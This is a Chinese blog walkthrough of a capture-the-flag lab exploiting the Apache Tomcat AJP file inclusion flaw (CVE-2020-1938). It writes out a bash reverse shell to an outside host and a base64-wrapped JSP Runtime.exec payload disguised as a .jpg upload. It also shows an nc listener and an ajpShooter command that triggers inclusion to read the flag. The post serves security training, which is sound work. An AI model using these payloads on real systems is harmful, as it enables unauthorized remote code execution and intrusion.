安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)

漏洞环境

安鸾渗透实战平台
公网vps
CVE-2020-1938文件包含exp
base64加密网站

题目:


在这里插入图片描述

解法:

1、访问对应网页

网页上可以发现一个明显的上传点,而题目是文件包含漏洞,所以可以编写一个代码代码文件上传,然后使用文件包含就行。由于文件包含不限制后缀,这里直接上传.jsp后缀即可
在这里插入图片描述

2、制作一个反弹shell文件

写一个反弹shell然后拿去base64加密

bash -i >& /dev/tcp/1.1.1.1/666  0>&1

在这里插入图片描述
将加密后的内容做拼接,方便java解析

<%Runtime.getRuntime().exec("bash -c {echo,bash64加密后的内容}|{base64,-d}|{bash,-i}");%>

保存为jpg
在这里插入图片描述

3、来到上传点进行上传

在这里插入图片描述
上传后系统会把你的文件重命名,为了防止搞混,可以先点击查看所有图片去蹲点
在这里插入图片描述
文件上传成功,点击查看图片
在这里插入图片描述
找到你上传的图片
在这里插入图片描述鼠标右键点击复制图片连接
在这里插入图片描述

5、起一台公网vps使用nc监听反弹shell的端口

nc -lnp 666
在这里插入图片描述

6、使用脚本进行文件包含

python ajpShooter.py http://106.15.50.112:18080/whalwl 18009 /upload/2023-000002-000008.jpg eval
  • http://106.15.50.112:18080/whalwl:页面位置
  • 18009 :ajp端口号
  • /upload/2023-000002-000008.jpg :上传反弹shell图片的位置
  • eval :执行

当回显200状态码时,证明成功包含并执行文件
在这里插入图片描述

7、来到vps上检查效果

使用 find / -name flag 来查找flag

在这里插入图片描述
可以看到在根目录上,直接看

cat /flag

在这里插入图片描述
在这里插入图片描述

漏洞描述

  该漏洞使攻击者可以读取任何webapps文件(例如webapp配置文件,源代码等)或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。

影响版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值